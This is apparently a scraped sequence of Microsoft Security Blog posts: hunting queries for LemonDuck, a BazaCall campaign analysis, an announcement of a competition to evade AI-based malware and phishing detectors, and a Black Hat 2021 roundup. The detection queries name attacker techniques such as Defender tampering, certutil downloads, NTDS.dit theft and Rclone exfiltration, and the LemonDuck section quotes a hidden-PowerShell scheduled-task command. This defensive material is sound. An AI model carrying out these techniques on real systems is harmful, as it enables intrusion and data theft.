  • Suspicious System Network Configuration Discovery
  • Suspicious sequence of exploration activities
  • Suspicious Process Discovery
  • Suspicious System Owner/User Discovery
  • Suspicious System Network Connections Discovery
  • Suspicious Task Scheduler activity
  • Suspicious Microsoft Defender Antivirus exclusion
  • Suspicious behavior by cmd.exe was observed
  • Suspicious remote PowerShell execution
  • Suspicious behavior by svchost.exe was observed
  • A WMI event filter was bound to a suspicious event consumer
  • Attempt to hide use of dual-purpose tool
  • System executable renamed and launched
  • Microsoft Defender Antivirus protection turned off
  • Anomaly detected in ASEP registry
  • A script with suspicious content was observed
  • An obfuscated command line sequence was identified
  • A process was injected with potentially malicious code
  • A malicious PowerShell Cmdlet was invoked on the machine
  • Suspected credential theft activity
  • Outbound connection to non-standard port
  • Sensitive credential memory read

Advanced hunting

The LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.

NOTE: The following sample queries lets you search for a week’s worth of events. To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the Advanced Hunting page > Query tab, select the calendar drop-down menu to update your query to hunt for the Last 30 days.

LemonDuck template subject lines

Looks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. Run query in Microsoft 365 security center.

| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS',
'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?')
| where AttachmentCount >= 1

LemonDuck Botnet Registration Functions

Looks for instances of function runs with name “SIEX”, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. Run query in Microsfot 365 security center.

| where ActionType == "PowerShellCommand"
| where AdditionalFields =~ "{\"Command\":\"SIEX\"}"

LemonDuck keyword identification

Looks for simple usage of LemonDuck seen keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior, however there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. Run query in Microsoft 365 security center.

| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessCommandLine has_any("Lemon_Duck","LemonDuck")

LemonDuck Microsoft Defender tampering

Looks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. Run query in Microsoft 365 security center.

| where InitiatingProcessCommandLine has_all ("Set-MpPreference", "DisableRealtimeMonitoring", "Add-MpPreference", "ExclusionProcess")
| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp

Antivirus uninstallation attempts

Looks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. Run query in Microsoft 365 security center.

| where InitiatingProcessFileName =~ "wmic.exe"
| where InitiatingProcessCommandLine has_all("product where","name like","call uninstall","/nointeractive")
| where InitiatingProcessCommandLine has_any("Kaspersky","avast","avp","security","eset","AntiVirus","Norton Security")

Known LemonDuck component script installations

Looks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the “Killer” and “Infection” functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. Run query in Microsoft 365 security center.

| where InitiatingProcessFileName in ("powershell.exe","cmd.exe")
| where InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash") or
InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash",".bin") or
InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash","kr.bin","if.bin","m6.bin")

LemonDuck named scheduled creation

Looks for instances of the LemonDuck creates statically named scheduled tasks or a semi-unique pattern of task creation LemonDuck also utilizes launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: “schtasks.exe” /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\2IVLzNXfZV/F /tr “powershell -w hidden -c PS_CMD”.  Run query in Microsoft 365 security center.

| where FileName =~ "schtasks.exe"
| where ProcessCommandLine has("/create")
| where ProcessCommandLine has_any("/tn blackball","/tn blutea","/tn rtsa") or
ProcessCommandLine has_all("/create","/ru","system","/sc","/mo","/tn","/F","/tr","powershell -w hidden -c PS_CMD")

Competition killer script scheduled task execution

Looks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. Run query in Microsoft 365 security center.

| where ProcessCommandLine has_all("schtasks.exe","/Delete","/TN","/F")
| summarize make_set(ProcessCommandLine) by DeviceId
| extend DeleteVolume = array_length(set_ProcessCommandLine)
| where set_ProcessCommandLine has_any("Mysa","Sorry","Oracle Java Update","ok") where DeleteVolume >= 40 and DeleteVolume <= 80

LemonDuck hosts file adjustment for dynamic C2 downloads

Looks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. Run query in Microsoft 365 security center.

| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessCommandLine has_all("GetHostAddresses","etc","hosts")
or InitiatingProcessCommandLine has_all("GetHostAddresses","IPAddressToString","etc","hosts","DownloadData")


Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.


The post When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks appeared first on Microsoft Security Blog.

Attack AI systems in Machine Learning Evasion Competition

July 29th, 2021 No comments

Today, we are launching MLSEC.IO, an educational Machine Learning Security Evasion Competition (MLSEC) for the AI and security communities to exercise their muscle to attack critical AI systems in a realistic setting. Hosted and sponsored by Microsoft, alongside NVIDIA, CUJO AI, VM-Ray, and MRG Effitas, the competition rewards participants who efficiently evade AI-based malware detectors and AI-based phishing detectors.

Machine learning powers critical applications in virtually every industry: finance, healthcare, infrastructure, and cybersecurity. Microsoft is seeing an uptick of attacks on commercial AI systems that could compromise the confidentiality, integrity, and availability guarantees of these systems. Publicly known cases documented by MITRE’s ATLAS framework, show how with the proliferation of AI systems comes the increased risk that the machine learning powering these systems can be manipulated to achieve an adversary’s goals. While the risks are inherent in all deployed machine learning models, the threat is especially explicit in cybersecurity, where machine learning models are increasingly relied on to detect threat actors’ tools and behaviors. Market surveys have consistently indicated that the security and privacy of AI systems are top concerns for executives. According to CCS Insight’s survey of 700 senior IT leaders in 2020, security is now the biggest hurdle companies face with AI, cited by over 30 percent of respondents1.

However, security practitioners are unaware of how to clear this new hurdle. A recent Microsoft survey found that 25 out of 28 organizations did not have the right tools in place to secure their AI systems. While academic researchers have been studying how to attack AI systems for close to two decades, awareness among practitioners is low. That is why one recommendation for business leaders from the 2021 Gartner report Top 5 Priorities for Managing AI Risk Within Gartner’s MOST Framework published2 is that organizations “Drive staff awareness across the organization by leading a formal AI risk education campaign.”

It is critical to democratize the knowledge to secure AI systems. That is why Microsoft recently released Counterfit, a tool born out of our own need to assess Microsoft’s AI systems for vulnerabilities with the goal of proactively securing AI services. For those new to adversarial machine learning, NVIDIA released MINTNV, a hack-the-box style environment to explore and build their skills.

Participate in MLSEC.IO

With the launch today of MLSEC.IO, we aim to highlight how security models can be evaded by motivated attackers and allow practitioners to exercise their muscles attacking critical machine learning systems used in cybersecurity.

“There is a lack of practical knowledge about securing or attacking AI systems in the security community. Competitions like Microsoft’s MSLEC democratizes adversarial machine learning knowledge for the offensive and defensive security communities, as well as the machine learning community. MLSEC’s hands-on approach is an exciting entry point into AML.”—Christopher Cottrell, AI Red Team Lead, NVIDIA

The competition involves two challenges beginning on August 6 and ending on September 17, 2021: an Anti-Malware Evasion track and an Anti-Phishing Evasion track.

  1. Anti-Phishing Evasion Track: Machine learning is routinely used to detect a highly successful attacker technique for gaining initial via phishing. In this track, contestants play the role of an attacker and attempt to evade a suite of anti-phishing models. Custom built by CUJO AI, the phishing machine learning models are purpose-built for this competition only.
  2. Anti-Malware Evasion track: This challenge provides an alternative scenario for attackers wishing to bypass machine-learning-based antivirus: change an existing malicious binary in a way that disguises it from the antimalware model.

In addition, for each of the Attacker Challenge tracks, the highest-scoring submission that extends and leverages Counterfit—Microsoft’s open-source tool for investigating the security of machine learning modelswill be awarded a bonus prize.

“The security evasion challenge creates new pathways into cybersecurity and opens up access for a broader base of talent. This year, to lower barriers to entry, we are introducing the phishing challenge, while still strongly encouraging people without significant experience in malware to participate.”—Zoltan Balazs, Head of Vulnerability Research Lab at CUJO AI and cofounder of the competition.

Key details about the competition

  • The competition runs from August 6 to September 17, 2021. Registration will remain open throughout the duration of the competition.
  • Winners will be announced on October 27, 2021, and contacted via email.
  • Prizes for first place, honorable mentions, as well as a bonus prize will be awarded for each of the two tracks.

Learn More

To learn more about the 2021 Machine Learning Security Evasion Competition:

  • Register now to begin participating on August 6, 2021, to exercise your offensive security muscle.
  • Visit the Counterfit GitHub Repository to learn more about Counterfit.
  • If you are new to adversarial machine learning, practice attacking AI systems via NVIDIA’s MINTNV hack-the-box style challenge.

This competition is part of broader efforts at Microsoft to empower engineers to securely develop and deploy AI systems. We recommend using it alongside the following resources:

  • For security analysts to orient to threats against AI systems, Microsoft, in collaboration with MITRE, released an ATT&CK style AdvML Threat Matrix complete with case studies of attacks on production machine learning systems.
  • For security incident responders, we released our own bug bar to systematically triage attacks on machine learning systems.
  • For developers, we released threat modeling guidance specifically for machine learning systems.
  • For engineers and policymakers, Microsoft, in collaboration with Berkman Klein Center at Harvard University, released a taxonomy documenting various machine learning failure modes.

Register now to participate in the Machine Learning Security Evasion Competition that begins on August 6 and ends on September 17, 2021. Winners will be announced on October 27, 2021.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


1CCS Insight, Senior Leadership IT Investment Survey, Nick McQuire et. al, 18 August 2020.

2Gartner, Top 5 Priorities for Managing AI Risk Within Gartner’s MOST Framework, Avivah Litan, et al., 15 January 2021.

The post Attack AI systems in Machine Learning Evasion Competition appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

Microsoft at Black Hat 2021: Sessions, bug bounty updates, product news, and more

July 29th, 2021 No comments

Black Hat USA 2021 is about understanding the needs of security professionals and meeting you where you are. With last year’s pandemic-related firefighting still fresh in our minds, this year’s event will provide a welcome respite to learn about cutting-edge security solutions, build our skillsets, and network with peers.

Microsoft Security is committed to helping you secure your entire digital estate with integrated, comprehensive protection—bridging the gaps to catch what others miss. We provide the leading AI, automation, and expertise that help you detect threats quickly, respond effectively, and fortify your security posture.​ As the world enters a new normal where seasoned security professionals are more needed than ever, we’re proud to share our experience and learn from you at the virtual Black Hat USA 2021.

Virtual Microsoft-sponsored sessions

The Emerging Cyber Threat Landscape

Date and time: Tuesday, August 3, 1:15 PM – 1:45 PM PT

Black Hat CISO summit virtual breakout


  • Ann Johnson, Corporate Vice President, Security, Compliance, and Identity Business Development, Microsoft

The rapid rise of ransomware can be traced to WannaCry and (Not)Petya, which fused large-scale compromise techniques with an encryption payload that demanded a ransom payment in exchange for the decryption key. These successful attacks inspired a new generation of human-operated ransomware, expanding into an enterprise-scale operation blending targeted attacks and extortion. Learn how the rise in ransomware is influencing cyber strategies that can help strengthen your security posture.

Evolving Red Teaming at Microsoft

Date and time: Wednesday, August 4, 8 AM to 8:15 AM PT

Track: Security Operations and Incident Response


  • Alexandre Fernandes Costa, Principal Security Engineer Lead
  • Reid Borsuk, Principal Security Engineer

Representatives from one of the six teams dedicated to offensive security at Microsoft share how we’ve evolved from red teaming to broader offensive security practices and techniques. They’ll walk you through our collaborative approach to offensive security operations, all while demonstrating how red team activity is reflected in our products designed to stop adversaries in their tracks.

Preventing a Hostage Situation: Defusing the Pervasive Threat of Human-Operated Ransomware

Date and time: Wednesday, August 4, 3:10 PM – 3:30 PM PT

Track: Endpoint Security


  • Hadar Feldman, Product Management Lead, Microsoft 365 Defender
  • Itai Kollmann Dekel, Principal Research Manager, Microsoft Defender for Endpoint

Ransomware has evolved. We’ve all seen it progress from automated, indiscriminate nuisance attacks into the targeted, human-operated campaigns that cost businesses millions. Protecting against a ransomware attack is like preventing a hostage situation in real life—you need to understand the nature of the threat, assess your exposure to risk, identify high-value assets, implement protective measures, and have playbooks ready to respond rapidly.

In this session, we’ll take you through crisis prevention and mitigation strategies that can be a game-changer against human-operated ransomware. You’ll learn about our latest research on the ransomware threat landscape, based on in-depth analysis of dozens of real-world ransom attacks in the past year. We’ll examine how human-operated ransomware attacks have become more like advanced persistent threats, and what that means for your organization. We’ll discuss key mitigations that address common techniques observed in ransomware campaigns (like tampering with security products). Finally, we’ll examine approaches to contain aggressive ransomware along with critical ways to improve your ability to see through the noise—before it’s too late.

Inside the Most Impactful Nation-State Attack in History

Date and time: Thursday, August 5, 2:10 PM – 2:30 PM PT

Track: Security Operations and Incident Response


  • Elia Florio, Principal Research Lead, Microsoft
  • Ramin Nafisi, Senior Malware Reverse Engineer, Microsoft
  • Dana Baril, Senior Security Research Lead, Microsoft
  • Michael Grenetz, Senior Product Manager, Microsoft

Get an inside look into one of the most sophisticated attacks in history—the Nobelium incident—from the frontline responders that helped track and defend against it. We’ll discuss the adversary’s tradecraft, novel techniques, and expert recommendations that can help organizations protect themselves from the next wave of advanced threats.

Microsoft Bug Bounty Program

Microsoft awarded $13.6 million in bug bounties to more than 340 security researchers in 58 countries during the past 12 months. Bounties averaged more than $10,000 per award across all programs, with the largest ($200,000) awarded under the Hyper-V Bounty Program. The more than 1,200 eligible reports we received over the past year reflect the talent of the global security research community, as well as the spirit of partnership Microsoft fosters in addressing the challenges of a rapidly evolving threat landscape.

Bug bounty and research programs—new and updated

A heartfelt thank you goes out to everyone who shared their research with Microsoft over the past year. We look forward to sharing more Bug Bounty Program improvements with you in the coming year, as we continue to invest in our partnerships within the security research community.

Machine Learning Evasion Competition

Microsoft is seeing an uptick of attacks on commercial AI systems that could compromise the confidentiality, integrity, and availability guarantees of these systems. To help the AI and security community ramp up on this novel space, and provide a learning environment, today, we are launching MLSEC.IO, an educational Machine Learning Security Evasion Competition (MLSEC). Learn more about the competition and how to participate from our announcement blog.

Microsoft Security product news

Microsoft Azure Sentinel

In March 2021, Microsoft announced an important step in realizing our vision for integrated SIEM and XDR with the release of incidents integration between Azure Sentinel and Microsoft 365 Defender. Now, we’re excited to take another key step in this journey—bi-directional incidents syncing between Azure Defender and Azure Sentinel are now in public preview. With this capability, users can now automatically sync alerts, incidents, and incident statuses across the two products. Microsoft now delivers the only integrated SIEM and XDR with incident sharing across all components, streamlining the investigation process and giving your SecOps team more time to focus on what’s really important. Read  Microsoft Ignite 2021: What’s New in Azure Sentinel to learn more.

Microsoft Defender for Endpoint

Today’s threat environment is complex, and the endpoint continues to be a top attack vector. We recently released improvements and updates to the evaluation lab in Microsoft Defender for Endpoint to include new simulations by SafeBreach for attack campaigns such as Solorigate and Carbanak+FIN7, enabling security teams to better prepare for these types of advanced threats.

Robust prevention is a necessary first step in securing your organization. For that reason, we’re excited to share new device control capabilities for USB printing and removable storage to help organizations add additional layers of protection to their endpoints. We’ve also been extending our preventative capabilities across platforms, and the general availability of threat and vulnerability management for Linux adds to our existing support for macOS and Windows.

Finally, when responding to a potential threat, time is of the essence; so, we’ve focused on enabling security teams to scale their capabilities for more rapid investigations and response. Giving security teams the ability to download quarantined files without getting the user involved can dramatically speed up an investigation. In addition, our new live response API enables forensic evidence to be gathered as soon as suspicious activity is identified on a device.

Microsoft Azure Defender for IoT

Azure Defender for IoT is an agentless, network-layer monitoring solution for identifying unmanaged IoT and operational technology (OT) assets, prioritizing vulnerability mitigations, and continuously monitoring for threats using IoT/OT-aware behavioral analytics. Available for either on-premises or cloud-connected environments, Azure Defender for IoT is tightly integrated with Azure Sentinel and supports third-party security operation center (SOC) tools such as Splunk, IBM QRadar, and ServiceNow.

We’re happy to announce that IoT/OT-specific threat intelligence can now be continuously delivered to cloud-connected sensors—reducing manual efforts and helping to ensure constant security. Coming soon: mapping of threats to tactics and techniques for MITRE ATT&CK for industrial control systems (ICS). Plus be sure to attend our Black Hat session featuring Azure Defender for IoT security researchers describing BadAlloc, the critical RCE vulnerability they uncovered in widely used IoT/OT real-time operating systems (RTOS), libraries, and SDKs.

App governance add-on to Microsoft Cloud App Security

App governance is a new add-on capability to Microsoft Cloud App Security that can be used to monitor, protect, and govern OAuth-enabled third-party apps on Microsoft 365 platform that use Microsoft Graph API. The new app governance add-on, now in preview, helps security administrators and analysts to quickly identify, alert, and prevent risky app behaviors from Microsoft 365 compliance center.

Learn more about the new app governance add-on:

Azure Key Vault Managed hardware security modules (HSM)

Azure Key Vault Managed HSM is a fully managed, highly available, single-tenant, standards-compliant cloud service that enables customers to safeguard cryptographic keys for their cloud applications using FIPS 140-2 Level 3 validated HSMs.

Always Encrypted

Always Encrypted protects sensitive data (credit card or social security numbers) stored in Azure SQL Database or SQL Server databases, allowing our customers to encrypt data inside client applications without revealing the encryption keys to the database engine. Meaning, Always Encrypted maintains a secure separation between those who own the data and those who manage it. The general availability of Always Encrypted strengthens our promise that Microsoft Azure offers the broadest support for confidential computing. Along with Azure Confidential Ledger and support for Kubernetes and other confidential containers, Always Encrypted gives our customers the broadest range of options for making their virtual machines (VMs), applications, and services confidential.

Learn more about Microsoft Security solutions

We look forward to joining you at Microsoft virtual booth 2340 for Black Hat 2021, July 31 to August 5, 2021.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft at Black Hat 2021: Sessions, bug bounty updates, product news, and more appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

BazaCall: Phony call centers lead to exfiltration and ransomware

July 29th, 2021 No comments

Our continued investigation into BazaCall campaigns, those that use fraudulent call centers that trick unsuspecting users into downloading the BazaLoader malware, shows that this threat is more dangerous than what’s been discussed publicly in other security blogs and covered by the media. Apart from having backdoor capabilities, the BazaLoader payload from these campaigns also gives a remote attacker hands-on-keyboard control on an affected user’s device, which allows for a fast network compromise. In our observation, attacks emanating from the BazaCall threat could move quickly within a network, conduct extensive data exfiltration and credential theft, and distribute ransomware within 48 hours of the initial compromise.

BazaCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams where potential victims are being cold-called by the attacker, except in BazaCall’s case, targeted users must dial the number. And when they do, the users are connected with actual humans on the other end of the line, who then provide step-by-step instructions for installing malware into their devices. Thus, BazaCall campaigns require direct phone communication with a human and social engineering tactics to succeed. Moreover, the lack of obvious malicious elements in the delivery methods could render typical ways of detecting spam and phishing emails ineffective.

Figure 1. The flow of a typical BazaCall attack, from the spam email to social engineering to the payload being downloaded and hands-on-keyboard attacks

The use of another human element in BazaCall’s attack chain through the abovementioned hands-on-keyboard control further makes this threat more dangerous and more evasive than traditional, automated malware attacks. BazaCall campaigns highlight the importance of cross-domain optics and the ability to correlate events in building a comprehensive defense against complex threats.

Microsoft 365 Defender orchestrates protection across domains to deliver coordinated defense. In the case of BazaCall, Microsoft Defender for Endpoint detects malware and attacker behavior resulting from the campaign, and these signals inform Microsoft Defender for Office 365 protections against related emails, even if these emails don’t have the typical malicious artifacts. Microsoft threat analysts who constantly monitor BazaCall campaigns enrich the intelligence on this threat and enhance our ability to protect customers.

In this blog post, we discuss how a recent BazaCall campaign attempts to compromise systems and networks through the mentioned human elements and how Microsoft defends against it.

Out with the links and attachments, in with the customer service phone numbers

BazaCall campaigns begin with an email that uses various social engineering lures to trick target recipients into calling a phone number. For example, the email informs users about a supposed expiring trial subscription and that their credit card will soon be automatically charged for the subscription’s premium version. Each wave of emails in the campaign uses a different “theme” of subscription that is supposed to be expiring, such as a photo editing service or a cooking and recipes website membership. In a more recent campaign, the email does away with the subscription trial angle and instead poses as a confirmation receipt for a purchased software license.

Unlike typical spam and phishing emails, BazaCall’s do not have a link or attachment in its message body that users must click or open. Instead, it instructs users to call a phone number in case they have questions or concerns. This lack of typical malicious elements—links or attachments—adds a level of difficulty in detecting and hunting for these emails. In addition, the messaging of the email’s content might also add an air of legitimacy if the user has been narrowly trained to avoid typical phishing and malware emails but not taught to be wary of social engineering techniques.

Figure 2. A typical BazaCall email, claiming that the user’s trial for a photo editing service will soon expire, and that they will be automatically charged. A fake customer service number is provided to help cancel the subscription.

Each BazaCall email is sent from a different sender, typically using free email services and likely-compromised email addresses. The lures within the email use fake business names that are similar to the names of real businesses. A recipient who then searches the business name online to check the email’s legitimacy may be led to believe that such a company exists and that the message they received has merit.

Some sample subject lines are listed below. They each have a unique “account number” created by the attackers to identify the recipients:

  • Soon you’ll be moved to the Premium membership, as the demo period is ending. Personal ID: KT[unique ID number]
  • Automated premium membership renewal notice GW[unique ID number] 👵
  • Your demo stage is nearly ended. Your user account number VC[unique ID number]. All set to continue?
  • Notification of an abandoned road accident site! Must to get hold of a manager! [body of email contains unique ID number]
  • Thanks for deciding to become a member of BooyaFitness. Fitness program was never simpler before [body of email contains unique ID number]
  • Your subscription will be changed to the gold membership, as the trial is ending. Order: KT[unique ID number]
  • Your free period is almost ended. Your member’s account number VC[unique ID number]. Ready to move forward?
  • Thank you for getting WinRAR pro plan. Your order # is WR[unique ID number].
  • Many thanks for choosing WinRAR. You need to check out the information about your licenses [body of email contains unique ID number]

While the subject lines in most of the observed campaigns contain similar keywords and occasional emojis, each one is unique because it includes an alphanumeric sequence specific to the recipient. This sequence is always presented as a user ID or transaction code, but it actually serves as a way for the attacker to identify the recipient and track the latter’s responses to the campaign. The unique ID numbers largely follow the same pattern, which the regular expression [A-Z]{1,3}(?:\d{9,15}) can surface, for example, L0123456789 and KT01234567891.

In one recent BazaCall campaign, the unique ID was present in the body of the email, but not in the subject line:

Figure 3. A recent BazaCall email with the unique ID present only in the message body.

If a target recipient does decide to call the phone number indicated in the email, they will speak with a real person from a fraudulent call center set up by BazaCall’s operators. The call center agent serves as a conduit to the next phase of the attack: during their conversation, an agent tells the caller they can help cancel the supposed subscription or transaction. To do so, the agent asks the caller to visit a website.

These websites are designed to look like legitimate businesses, some of which even impersonate actual companies. However, we have noted that some domain names do not always match the name of the fictitious business included in the email. For example, an email claiming that a user’s free trial for “Pre Pear Cooking” was set to expire was paired with the domain, “topcooks[.]us”.

Figure 4. A sample website used in the BazaCall campaign. It mimics a real recipe website but is attacker-controlled.

The call center agent then instructs the user to navigate to the account page and download a file to cancel their subscription. The file is a macro-enabled Excel document, with names such as “cancel_sub_[unique ID number].xlsb.” Note that in some instances, we observed that even if security filters such as Microsoft Defender SmartScreen are enabled, users intentionally bypass it to download the file, which indicates that the call center agent is likely instructing the user to circumvent security protocols, with the threat that their credit cards will be charged if they don’t. Again, this demonstrates the effectiveness of social engineering tactics used in BazaCall attacks.

The downloaded Excel file displays a fake notification that it is protected by Microsoft Office. The call center agent then instructs the user to click on the button that enables editing and content (macros) to view the spreadsheet’s contents. If the user enables the macro, BazaLoader malware is delivered to the device.

Figure 5. An Excel document used by the attackers, prompting the user to enable malicious code.

Hands-on-keyboard control for selective data exfiltration

The enabled macro on the Excel document creates a new folder named with a random string of characters in the %programdata% folder. It then copies certutil.exe, a known living-off-the-land binary (LOLBin), from the System folder and places the copy of certutil.exe into the newly created folder as a means of defense evasion. Finally, the copy of certutil.exe is renamed to match the random string of characters in the folder name.

The macro then uses the newly renamed copy of certutil.exe to connect to the attacker infrastructure and download BazaLoader. This downloaded payload is a malicious dynamic link library (.dll) and is loaded by rundll32.exe. Rundll32 then injects a legitimate MsEdge.exe process to connect to a BazaLoader command-and-control (C2) and establish persistence by using Edge to create a .lnk (shortcut) file to the payload in the Startup folder. The injected MsEdge.exe is also used for reconnaissance, collecting system and user information, domains on the networks, and domain trusts.

The rundll32.exe process retrieves a Cobalt Strike beacon that enables the attacker to have hands-on-keyboard control of the device. Now with direct access, the attacker performs reconnaissance on the network and searches for local administrators and high-privilege domain administrator account information.

The attacker also conducts further extensive reconnaissance using ADFind, a free command-line tool designed for Active Directory discovery. Often, information gathered from this reconnaissance is saved to a text file and viewed by the attacker using the “Type” command in the command prompt.

Once the attacker has established a list of target devices on the network, they use Cobalt Strike’s custom, built-in PsExec functionality to move laterally to the targets. Each device the attacker lands on establishes a connection to the Cobalt Strike C2 server. Additionally, certain devices are used for additional reconnaissance by downloading open-source tools designed to steal browser passwords. In some instances, the attackers also used WMIC to move laterally to high-value targets, such as Domain Controllers.

When the attacker lands on a selected high-value target, they use 7-Zip to archive intellectual property for exfiltration. The archived files are named after the type of data they contain, such as IT information, or information about security operations, finance and budgeting, and details specific to each target’s industry. The attacker then uses a renamed version of the open-source tool, RClone, to exfiltrate these archives to an attacker-controlled domain.

Figure 6 Post-compromise activity on the target, including exfiltration and ransomware.

Finally, on domain controller devices, the attacker uses NTDSUtil.exe—a legitimate tool typically used to create and maintain the Active Directory database—to create a copy of the NTDS.dit Active Directory database, in either the %programdata% or %temp% folders, for subsequent exfiltration. NTDS.dit contains user information and password hashes for all users in the domain.

In some instances, data exfiltration appeared to be the primary objective of the attack, which would typically be in preparation for future activity. However, in other instances, the attacker deploys ransomware after conducting the previously described activity. In those cases where ransomware was dropped, the attacker used high-privilege compromised accounts in conjunction with Cobalt Strike’s PsExec functionality to drop a Ryuk or Conti ransomware payload onto network devices.

Detecting BazaCall through cross-domain visibility and threat intelligence

While many cybersecurity threats rely on automated, drive-by tactics (for example, exploiting system vulnerabilities to drop malware or compromising legitimate websites for a watering hole attack) or develop advanced detection evasion methods, attackers continue to find success in social engineering and human interaction in attacks. The BazaCall campaign replaces links and attachments with phone numbers in the emails it sends out, posing challenges in detection, especially by traditional antispam and anti-phishing solutions that check for those malicious indicators.

The lack of typical malicious elements in BazaCall’s emails and the speed with which their operators can conduct an attack exemplify the increasingly complex and evasive threats that organizations face today. Microsoft 365 Defender provides the cross-domain visibility and coordinated defense to protect customers against such threats. The ability to correlate events across endpoints and emails is crucial in the case of BazaCall, given its distinct characteristics. Microsoft Defender for Endpoint detects implants such as BazaLoader and Cobalt Strike, payloads such as Conti and Ryuk, and subsequent attacker behavior. These endpoint signals are correlated with email threat data, informing Microsoft Defender for Office 365 to block the BazaCall emails, even if these emails don’t have the typical malicious artifacts.

Microsoft 365 Defender further enables organizations to defend against this threat through rich investigations tools like advanced hunting, allowing security teams to locate related or similar activities and seamlessly resolve them.


Justin Carroll and Emily Hacker

Microsoft 365 Defender Threat Intelligence Team


Advanced hunting queries

The following Advanced Hunting Queries are accurate as of the time of publish of this blog. For the most up-to-date queries, please visit

To locate possible exploitation activity, run the following queries in the Microsoft 365 Defender portal.

BazaCall emails

To look for malicious emails matching the patterns of the BazaCall campaign, run this query.

| where Subject matches regex @"[A-Z]{1,3}\d{9,15}"
and Subject has_any('trial', 'free', 'demo', 'membership', 'premium', 'gold',
'notification', 'notice', 'claim', 'order', 'license', 'licenses')

BazaCall Excel file delivery

To look for signs of web file delivery behavior matching the patterns of the BazaCall campaign, run this query.

| where FileOriginUrl has "/cancel.php" and FileOriginReferrerUrl has "/account"
or FileOriginUrl has "/download.php" and FileOriginReferrerUrl has "/case"

BazaCall Excel file execution

To surface the execution of malicious Excel files associated with BazaCall, run this query.

| where InitiatingProcessFileName =~ "excel.exe"
and ProcessCommandLine has_all('mkdir', '&& copy', 'certutil.exe')

BazaCall Excel file download domain pattern

To look for malicious Excel files downloaded from .XYZ domains, run this query.

| where RemoteUrl matches regex @".{14}\.xyz/config\.php"

BazaCall dropping payload via certutil

To look for the copy of certutil.exe that was used to download the BazaLoader payload, run this query.

| where InitiatingProcessFileName !~ "certutil.exe"
| where InitiatingProcessFileName !~ "cmd.exe"
| where InitiatingProcessCommandLine has_all("-urlcache", "split", "http")

NTDS theft

To look for theft of Active Directory in paths used by this threat, run this query.

| where FileName =~ "ntdsutil.exe"
| where ProcessCommandLine has_any("full", "fu")
| where ProcessCommandLine has_any ("temp", "perflogs", "programdata")
// Exclusion
| where ProcessCommandLine !contains @"Backup"

Renamed Rclone data exfiltration

To look for data exfiltration using renamed Rclone, run this query.

| where ProcessVersionInfoProductName has "rclone" and not(FileName has "rclone")

RunDLL Suspicious Network Connections

To look for RunDLL making suspicious network connections, run this query.

| where InitiatingProcessFileName =~ 'rundll32.exe' and InitiatingProcessCommandLine has ",GlobalOut"


Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.

The post BazaCall: Phony call centers lead to exfiltration and ransomware appeared first on Microsoft Security Blog.

Zero Trust Adoption Report: How does your organization compare?

July 28th, 2021 No comments

From the wide adoption of cloud-based services to the proliferation of mobile devices. From the emergence of advanced new cyberthreats to the recent sudden shift to remote work. The last decade has been full of disruptions that have required organizations to adapt and accelerate their security transformation. And as we look forward to the next major disruption—the move to hybrid work—one thing is clear: the pace of change isn’t slowing down.

